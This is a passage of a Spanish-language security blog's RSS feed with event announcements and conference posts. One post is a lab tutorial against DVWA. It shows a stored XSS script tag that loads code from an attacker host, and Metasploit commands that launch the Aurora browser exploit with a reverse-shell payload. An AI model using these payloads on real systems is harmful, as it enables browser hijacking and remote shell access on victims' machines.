&lt;b&gt;&lt;span style="font-size: medium;"&gt;De qué se trata?&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;a href="http://1hackparaloschicos.org/"&gt;#1HackParaLosChicos&lt;/a&gt;&lt;/b&gt;,  surgió a partir de la unión de diferentes profesionales de seguridad de  la información de la Argentina, cuyo espíritu solidario dio lugar a  convenir en que era una gran idea realizar una jornada de seguridad en  la cual se recauden Leche en Polvo y Juguetes.&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: medium;"&gt;Agenda del Evento&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
- Presentación del Evento 1HackParaLosChicos&lt;br /&gt;
- Seguridad en Dispositivos Móviles&lt;br /&gt;
- Presentación Argentina Cibersegura&lt;br /&gt;
- Seguridad vs Desarrolladores&lt;br /&gt;
- Filosofía Hacker&lt;br /&gt;
- Desventuras de Ser Paranoico 2.0&lt;br /&gt;
- Wifi @ HOME&lt;br /&gt;
- Técnicas de Infección de Malware&lt;br /&gt;
- La Familia en Internet&lt;br /&gt;
- Reputación Online&lt;br /&gt;
- Seguridad en Internet, padres e hijos&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: medium;"&gt;Cuándo y Dónde?&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;La jornada se realizará el 26 de Julio  en las oficinas de Microsoft en Bouchard 710 4° piso, CABA, desde las  8.40 AM y hasta las 18 PM. (&lt;a href="http://maps.google.com.ar/maps?q=Bouchard+710,+capital+federal&amp;amp;oe=utf-8&amp;amp;um=1&amp;amp;ie=UTF-8&amp;amp;hq=&amp;amp;hnear=0x95a3353482da086f:0xea7bc2cec28eb9f,Bouchard+710,+Ciudad+Aut%C3%B3noma+de+Buenos+Aires&amp;amp;gl=ar"&gt;Ver Mapa&lt;/a&gt;)&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: medium;"&gt;Qué Donar ?&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Dado que no se cobrará entrada,  teniendo en cuenta las necesidades de quiénes recibirán las donaciones  (chicos de 0 a 5 años), para asistir a la jornada hay que registrarse  previamente y acercar lo siguiente:&lt;/div&gt;&lt;br /&gt;
- 1 Kilo de Leche en Polvo.&lt;br /&gt;
- 1 Juguete que ronde los $50 (apróx). Neutral en cuanto al género (nena o nene).&lt;br /&gt;
&lt;br /&gt;
Algunos Ejemplos:&lt;br /&gt;
- Masas.&lt;br /&gt;
- Plastilinas.&lt;br /&gt;
- Juegos de mesa.&lt;br /&gt;
- Rompecabezas.&lt;br /&gt;
- Herramientas para dibujar.&lt;br /&gt;
- Juegos de encastre y estimulación temprana.&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Durante la jornada, la logística de las donaciones estará a cargo de la &lt;a href="http://caminandojuntos.org.ar/"&gt;Fundación Caminando Juntos&lt;/a&gt;, y el destinatario será uno de los "Centros Conin" del partido de San Martín.&lt;/div&gt;&lt;br /&gt;
Recordá, que para poder asistir es fundamental que te &lt;b&gt;&lt;a href="http://1hackparaloschicos.org/registro.php"&gt;Registres&lt;/a&gt;&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
Mas info en: &lt;b&gt;&lt;a href="http://1hackparaloschicos.org/"&gt;http://1hackparaloschicos.org/&lt;/a&gt;&lt;/b&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-7002940821675484908?l=www.kungfoosion.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/_ZL06qnBeQM" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/_ZL06qnBeQM/1hackparaloschicos-jornada-solidaria.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-LHZQec4UhkY/TichBdhH_RI/AAAAAAAAFyY/vH7Ya2Bz1J0/s72-c/1hackparaloschicos.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.kungfoosion.com/2011/07/1hackparaloschicos-jornada-solidaria.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-4841239579723334775</guid><pubDate>Tue, 05 Jul 2011 20:25:00 +0000</pubDate><atom:updated>2011-12-16T22:22:24.068-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Conferencias</category><title>Video de "Atacando Infraestructuras Corporativas Wireless" en la Campus Party Colombia</title><description>&lt;div style="text-align: justify;"&gt;Video de la charla "&lt;a href="http://www.campus-party.com.co/2011/seguridad-y-redes.html#atacandoinfraestructuras"&gt;Atacando Infraestructuras Corporativas Wireless&lt;/a&gt;" que dictarán los amigos &lt;a href="http://twitter.com/jbasaldua"&gt;Jerónimo Basaldúa&lt;/a&gt; y &lt;a href="http://twitter.com/p4dawan"&gt;Lucas Duarte Wulfert&lt;/a&gt; en la &lt;a href="http://www.campus-party.com.co/"&gt;Campus Party de Colombia&lt;/a&gt;. &lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&lt;iframe allowfullscreen="" frameborder="0" height="326" src="http://www.youtube.com/embed/ncupgyyK7mQ" width="400"&gt;&lt;/iframe&gt; &lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Próximamente mas info sobre el resto de las 4 charlas que dictamos en la Campus Party!&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
Publicado por Leonardo Pigñer en &lt;a href="http://www.kungfoosion.com/"&gt;www.KUNGFOOSION.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-4841239579723334775?l=www.kungfoosion.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/TN1xbM9B_5k" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/TN1xbM9B_5k/video-de-atacando-infraestructuras.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://img.youtube.com/vi/ncupgyyK7mQ/default.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.kungfoosion.com/2011/07/video-de-atacando-infraestructuras.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-3035705223095875863</guid><pubDate>Wed, 29 Jun 2011 17:39:00 +0000</pubDate><atom:updated>2011-12-16T22:22:24.069-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Conferencias</category><title>Slides de "Atacando Smartphones" en la Campus Party Colombia</title><description>&lt;div style="text-align: justify;"&gt;Slides de la charla &lt;b&gt;&lt;i&gt;"&lt;/i&gt;&lt;a href="http://www.campus-party.com.co/2011/seguridad-y-redes.html#smartphones"&gt;Atacando Smartphones&lt;/a&gt;&lt;i&gt;"&lt;/i&gt;&lt;/b&gt; dictada por &lt;a href="http://twitter.com/jbasaldua"&gt;&lt;b&gt;Jerónimo Basaldúa&lt;/b&gt;&lt;/a&gt; y &lt;a href="http://twitter.com/p4dawan"&gt;&lt;b&gt;Lucas Duarte Wulfert&lt;/b&gt;&lt;/a&gt; en la Campus Party Colombia.&lt;br /&gt;
&lt;br /&gt;
Anoche, Jerónimo y Lucas, dictaron la charla "Atacando Smartphones" en la Campus Party Colombia, y según me comentaron fue un verdadero éxito. Felicitaciones para ellos!&lt;br /&gt;
&lt;br /&gt;
Seguramente cuando vuelvan, nos contarán que tal estuvo esta edición de la Campus Party, pero mientras tanto les dejo los slides de la charla, en la que yo aporte mi granito de arena con el humilde diseño gráfico ;-)&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&lt;div id="__ss_8460352" style="width: 425px;"&gt;&lt;strong style="display: block; margin: 12px 0 4px;"&gt;&lt;a href="http://www.slideshare.net/kungfoosion/atacando-smartphones" title="Atacando Smartphones"&gt;Atacando Smartphones&lt;/a&gt;&lt;/strong&gt;&lt;object height="355" id="__sse8460352" width="425"&gt;&lt;param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=cpco4base4secatacandosmartphones-110629115443-phpapp02&amp;amp;stripped_title=atacando-smartphones&amp;amp;userName=kungfoosion" /&gt;&lt;param name="allowFullScreen" value="true"/&gt;&lt;param name="allowScriptAccess" value="always"/&gt;&lt;embed name="__sse8460352" src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=cpco4base4secatacandosmartphones-110629115443-phpapp02&amp;amp;stripped_title=atacando-smartphones&amp;amp;userName=kungfoosion" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div style="padding: 5px 0 12px;"&gt;View more &lt;a href="http://www.slideshare.net/"&gt;presentations&lt;/a&gt; from &lt;a href="http://www.slideshare.net/kungfoosion"&gt;Leonardo Pigñer&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
Las próximas charlas y talleres, que Jerónimo y Lucas van a dictar durante la Campus Party son:&lt;br /&gt;
&lt;br /&gt;
- Viernes 1, 16:00: &lt;a href="http://www.campus-party.com.co/2011/seguridad-y-redes.html#atacandoinfraestructuras"&gt;Atacando Infraestructuras Corporativas Wireless&lt;/a&gt;&lt;br /&gt;
- Miércoles 29, 21:45: &lt;a href="http://www.campus-party.com.co/2011/seguridad-y-redes.html#armadodeantenas"&gt;Armado de Antenas Wireless y Wardriving&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Estén atentos porque tal vez las transmitan en vivo!&lt;br /&gt;
&amp;nbsp;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Publicado por Leonardo Pigñer en &lt;a href="http://www.kungfoosion.com/"&gt;www.KUNGFOOSION.com&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-3035705223095875863?l=www.kungfoosion.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/TFyuLJEARJo" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/TFyuLJEARJo/slides-de-atacando-smartphones-en-la.html</link><author>noreply@blogger.com (KungFooSion)</author><thr:total>1</thr:total><feedburner:origLink>http://www.kungfoosion.com/2011/06/slides-de-atacando-smartphones-en-la.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-5548124891254180633</guid><pubDate>Wed, 13 Apr 2011 15:51:00 +0000</pubDate><atom:updated>2011-06-07T15:09:31.238-03:00</atom:updated><title>Próximas Fechas de Capacitación!</title><description>&lt;div style="text-align: justify;"&gt;A continuación tienen algunas de las próximas fechas de capacitaciones técnicas de &lt;a href="http://www.base4sec.com/"&gt;BASE4 Security&lt;/a&gt;.&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-Bh-UFxIBFPM/TaXFSDiW55I/AAAAAAAAFqM/S8oW7J0xH5Q/s1600/Campania-Mayo-Junio.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://4.bp.blogspot.com/-Bh-UFxIBFPM/TaXFSDiW55I/AAAAAAAAFqM/S8oW7J0xH5Q/s400/Campania-Mayo-Junio.png" width="311" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;No se olviden de seguir a &lt;b&gt;&lt;a href="http://twitter.com/base4sec"&gt;@base4sec en Twitter&lt;/a&gt;&lt;/b&gt; para estar enterados de todas las novedades y participar de próximas promociones.&lt;br /&gt;
&lt;br /&gt;
Nos vemos en el COMBAT Training del 2 al 6 de Mayo en Buenos Aires!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-5548124891254180633?l=www.kungfoosion.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/3mVW3k92HRw" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/3mVW3k92HRw/proximas-fechas-de-capacitacion.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-Bh-UFxIBFPM/TaXFSDiW55I/AAAAAAAAFqM/S8oW7J0xH5Q/s72-c/Campania-Mayo-Junio.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.kungfoosion.com/2011/04/proximas-fechas-de-capacitacion.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-1015021521589151661</guid><pubDate>Thu, 17 Mar 2011 19:11:00 +0000</pubDate><atom:updated>2011-12-16T22:22:24.070-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Segurinfo</category><category domain="http://www.blogger.com/atom/ns#">Conferencias</category><title>Edición 2011 de SEGURINFO</title><description>&lt;div style="text-align: justify;"&gt;Nuevamente &lt;b&gt;&lt;a href="http://www.base4sec.com/"&gt;BASE4 Security&lt;/a&gt;&lt;/b&gt; estuvo presente como sponsor en la edición 2011 de &lt;a href="http://www.segurinfo.org/"&gt;SEGURINFO&lt;/a&gt; en Argentina.&lt;br /&gt;
&lt;br /&gt;
Al igual que en la &lt;a href="http://www.ekoparty.org/"&gt;ekoparty&lt;/a&gt;, &lt;b&gt;&lt;a href="http://www.base4sec.com/"&gt;BASE4 Security&lt;/a&gt;&lt;/b&gt; fue responsable de armar una red wireless segura para &lt;a href="http://www.segurinfo.org/"&gt;SEGURINFO&lt;/a&gt;. Quienes visitaron nuestro stand, pudieron observar en tiempo real todos los ataques que se estaban desarrollando, aunque para ser sincero, no es nada comparado con los que se veían en la &lt;a href="http://www.ekoparty.org/"&gt;ekoparty&lt;/a&gt; ;-)&lt;br /&gt;
&lt;br /&gt;
Para continuar con la tradición de la empresa, fuimos en el único stand que tenia una barra de cerveza incorporada!&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://lh3.googleusercontent.com/-8-7Ve66jpOg/TYJbuEtw4nI/AAAAAAAAFl0/xz8mFs6GXTg/s1600/base4_beer_segurinfo.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="https://lh3.googleusercontent.com/-8-7Ve66jpOg/TYJbuEtw4nI/AAAAAAAAFl0/xz8mFs6GXTg/s400/base4_beer_segurinfo.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Estamos evaluando poner una en la oficina, aunque hay quienes dicen que podría llegar a afectar el rendimiento, mientras que otros dicen que por el contrario, con un par de cervezas encima trabajan mejor…&amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Les dejo una foto de parte del team de &lt;b&gt;&lt;a href="http://www.base4sec.com/"&gt;BASE4&lt;/a&gt;&lt;/b&gt; que estuvo presente en &lt;a href="http://www.segurinfo.org/"&gt;SEGURINFO&lt;/a&gt;:&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://lh4.googleusercontent.com/-7nachV_bGtA/TYJb7YFo5yI/AAAAAAAAFl4/nA9gucvJ28M/s1600/base4_segurinfo.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="282" src="https://lh4.googleusercontent.com/-7nachV_bGtA/TYJb7YFo5yI/AAAAAAAAFl4/nA9gucvJ28M/s400/base4_segurinfo.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://twitter.com/p4dawan"&gt;@p4dawan&lt;/a&gt;, &lt;a href="http://twitter.com/kfs"&gt;@kfs&lt;/a&gt;, Carlos Liteplo, &lt;a href="http://twitter.com/jbasaldua"&gt;@jbasaldua&lt;/a&gt;, Kosty Nayda, Luis Cruz, Sol Argento&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Desde ya agradezco a todos los amigos que pasaron a saludar y a compartir una cerveza con nosotros! Espero que pronto también lo podamos hacer en la oficina ;-) &lt;/div&gt;&amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Publicado por Leonardo Pigñer en &lt;a href="http://www.kungfoosion.com/"&gt;www.KUNGFOOSION.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-1015021521589151661?l=www.kungfoosion.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/ILIzFVBQMrY" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/ILIzFVBQMrY/edicion-2011-de-segurinfo.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://lh3.googleusercontent.com/-8-7Ve66jpOg/TYJbuEtw4nI/AAAAAAAAFl0/xz8mFs6GXTg/s72-c/base4_beer_segurinfo.JPG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.kungfoosion.com/2011/03/edicion-2011-de-segurinfo.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-556169705306871726</guid><pubDate>Wed, 16 Feb 2011 15:18:00 +0000</pubDate><atom:updated>2011-03-23T16:48:32.344-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">MetaSploit</category><title>Explotando XSS con Metasploit</title><description>&lt;div style="text-align: justify;"&gt;En el siguiente post, vamos a utilizar el framework XSSF con Metasploit, que nos permitirá atacar a una víctima con un simple XSS.&lt;br /&gt;
&lt;br /&gt;
XSSF es un framework, creado por Ludovic Courgnaud, que nos permite “administrar” víctimas de XSS genéricos y realizar posteriores ataques, así como mantener el enlace para futuros ataques. Podemos encontrar una&amp;nbsp; descripción más detallada del framework &lt;a href="http://www.metasploit.com/redmine/issues/2995"&gt;aquí&lt;/a&gt;.&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;Jugando con XSSF&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Para realizar estas pruebas vamos a utilizar el &lt;a href="http://www.dvwa.co.uk/"&gt;DVWA&lt;/a&gt;, un framework para testing de vulnerabilidades web, instalado sobre una VM&amp;nbsp; Windows XP y nuestro Backtrack 4 R2.&lt;br /&gt;
&lt;br /&gt;
Lo primero que vamos a hacer es descargar el XSSF framework desde &lt;b&gt;&lt;a href="http://www.metasploit.com/redmine/attachments/596/XSSF.zip"&gt;aquí&lt;/a&gt;&lt;/b&gt; y descomprimirlo en nuestro directorio de metasploit, luego iniciamos el framework:&lt;/div&gt;&lt;br /&gt;
&lt;pre class="codigo"&gt;# Instalamos XSSF en Metasploit
cd /opt/metasploit/msf3
wget http://www.metasploit.com/redmine/attachments/596/XSSF.zip
unzip XSSF.zip
cd XSSF
cp -r data/ lib/ modules/ plugins/ ../

# Iniciamos Metasploit y cargamos el XSSF
msfconsole
load XSSF&lt;/pre&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-2jDnb4Be-20/TVvmKTw4SbI/AAAAAAAAFkg/xOqa3YJ2Dv8/s1600/XSSF_loading.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="227" src="http://2.bp.blogspot.com/-2jDnb4Be-20/TVvmKTw4SbI/AAAAAAAAFkg/xOqa3YJ2Dv8/s400/XSSF_loading.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Ahora vamos a DVWA, a la pestaña XSS stored, con el DVWA Security en “Low” e insertamos el siguiente XSS:&lt;/div&gt;&lt;br /&gt;
&lt;pre class="codigo"&gt;&lt;pre&gt;&lt;code class="html"&gt;&amp;lt;&lt;/code&gt;script src=”http://IP_BACKTRACK:8888/loop?interval=5”&amp;gt;&amp;lt;/script&amp;gt;&lt;/pre&gt;&lt;/pre&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-nmBh8llTL10/TVvmrUH0MjI/AAAAAAAAFkk/CipMNje9K1A/s1600/XSS_DVWA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="155" src="http://4.bp.blogspot.com/-nmBh8llTL10/TVvmrUH0MjI/AAAAAAAAFkk/CipMNje9K1A/s400/XSS_DVWA.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Si todo funcionó bien, deberá quedar registrado nuestro nombre y el comentario en blanco.&lt;br /&gt;
&lt;br /&gt;
Ahora, desde nuestra VM Windows XP, ingresamos a DVWA, ponemos el DVWA Security en “Low” y vamos a la pestaña XSS stored. Al momento de ingresar nuestro XSS entrará en acción ;)&lt;br /&gt;
&lt;br /&gt;
Regresamos a nuestra consola de metasploit y vemos las víctimas que tenemos disponibles con el comando &lt;b&gt;&lt;i&gt;"xssf_victims"&lt;/i&gt;&lt;/b&gt;:&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-Zv5DH9CzWtI/TVvnNCCE0hI/AAAAAAAAFko/mV3ChugSntc/s1600/XSSF_victims.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="111" src="http://4.bp.blogspot.com/-Zv5DH9CzWtI/TVvnNCCE0hI/AAAAAAAAFko/mV3ChugSntc/s400/XSSF_victims.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Si queremos obtener más información acerca de alguna víctima, ingresamos el siguiente comando &lt;b&gt;&lt;i&gt;"xssf_information victimID"&lt;/i&gt;&lt;/b&gt;:&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-NnZhOhuXJyI/TVvnfJ4-JgI/AAAAAAAAFks/bmvlBBfkYXM/s1600/XSSF_INFO.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="220" src="http://4.bp.blogspot.com/-NnZhOhuXJyI/TVvnfJ4-JgI/AAAAAAAAFks/bmvlBBfkYXM/s400/XSSF_INFO.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Ahora ya podremos hacer varias cosas con la víctima, por ejemplo enviarle un popup:&lt;/div&gt;&lt;br /&gt;
&lt;pre class="codigo"&gt;use auxiliary/xssf/alert
set VictimIDs 2
set AlertMessage "Game Over"&lt;/pre&gt;&lt;br /&gt;
&amp;nbsp;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-dM00HGOS-6c/TVvnwvKF8eI/AAAAAAAAFkw/B3RPQ8RvjpY/s1600/XSSF_popup.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="156" src="http://1.bp.blogspot.com/-dM00HGOS-6c/TVvnwvKF8eI/AAAAAAAAFkw/B3RPQ8RvjpY/s400/XSSF_popup.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;También podremos lanzar un exploit contra el navegador para obtener una shell en el sistema:&lt;/div&gt;&lt;br /&gt;
&lt;pre class="codigo"&gt;use exploit/windows/browser/ms10_002_aurora
set SRVPORT 80
set PAYLOAD windows/shell/reverse_tcp
set LHOST IP_BACKTRACK
set URIPATH dvwa/vulnerabilities/xss_s/&lt;/pre&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Vemos que job nos creo, el id de la victima y luego lanzamos el exploit desde el XSSF:&lt;/div&gt;&lt;br /&gt;
&lt;pre class="codigo"&gt;jobs
xssf_active_victims
xssf_exploit victimID jobID&lt;/pre&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-9d_GlemsUtM/TVvoL5HoEwI/AAAAAAAAFk4/wf96tG5Sc9I/s1600/XSSF_aurora.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="158" src="http://3.bp.blogspot.com/-9d_GlemsUtM/TVvoL5HoEwI/AAAAAAAAFk4/wf96tG5Sc9I/s400/XSSF_aurora.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Espero que les haya gustado mi primer post! :)&lt;/div&gt;&lt;br /&gt;
Referencias:&lt;br /&gt;
- &lt;a href="http://www.metasploit.com/redmine/issues/2995"&gt;http://www.metasploit.com/redmine/issues/2995&lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://www.dvwa.co.uk/"&gt;http://www.dvwa.co.uk/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Publicado por Lucas Duarte Wulfert en &lt;a href="http://www.kungfoosion.com/"&gt;www.KUNGFOOSION.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-556169705306871726?l=www.kungfoosion.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/yP7JEXEVDbY" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/yP7JEXEVDbY/explotando-xss-con-metasploit.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-2jDnb4Be-20/TVvmKTw4SbI/AAAAAAAAFkg/xOqa3YJ2Dv8/s72-c/XSSF_loading.png" height="72" width="72" /><thr:total>6</thr:total><feedburner:origLink>http://www.kungfoosion.com/2011/02/explotando-xss-con-metasploit.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-2162308804295988985</guid><pubDate>Tue, 08 Feb 2011 16:03:00 +0000</pubDate><atom:updated>2011-03-23T16:48:41.139-03:00</atom:updated><title>Nuevo Colaborador del Blog!</title><description>&lt;div style="text-align: justify;"&gt;Tengo el verdadero placer de sumar al Ing. Lucas Duarte Wulfert, también conocido como &lt;a href="http://twitter.com/p4dawan"&gt;p4dawan&lt;/a&gt;, como nuevo colaborador de este blog! &lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_8alnjaETaog/TVFnxAG-vaI/AAAAAAAAFkc/947oF_v8pYg/s1600/padawan_kfs.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://4.bp.blogspot.com/_8alnjaETaog/TVFnxAG-vaI/AAAAAAAAFkc/947oF_v8pYg/s320/padawan_kfs.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Desde hace algunos meses, Lucas trabaja como Security Consultant en el área de Servicios Profesionales de &lt;a href="http://www.base4sec.com/"&gt;BASE4 Security&lt;/a&gt;. Quienes siguen este blog seguramente lo habrán visto en alguna foto como co-instructor del &lt;a href="http://www.base4sec.com/capacitacion-detalle.php?id=409"&gt;COMBAT Training&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
Dentro de sus actividades diarias, Lucas realiza testings de Ethical Hacking y Penetration Testing, y actualmente se encuentra activamente investigando y actualizando el contenido de los trainings.&lt;br /&gt;
&lt;br /&gt;
Lucas se encuentra cursando el Master de Seguridad Informática en la Universidad de Buenos Aires.&lt;br /&gt;
&lt;br /&gt;
Sin ninguna duda, el amigo Lucas va a realizar interesantes aportes para los lectores de &lt;a href="http://kungfoosion.com/"&gt;KUNGFOOSION.COM&lt;/a&gt; :-)&lt;br /&gt;
&lt;br /&gt;
Twitter de Lucas: &lt;a href="http://twitter.com/p4dawan"&gt;@p4dawan&lt;/a&gt;&lt;/div&gt;&amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
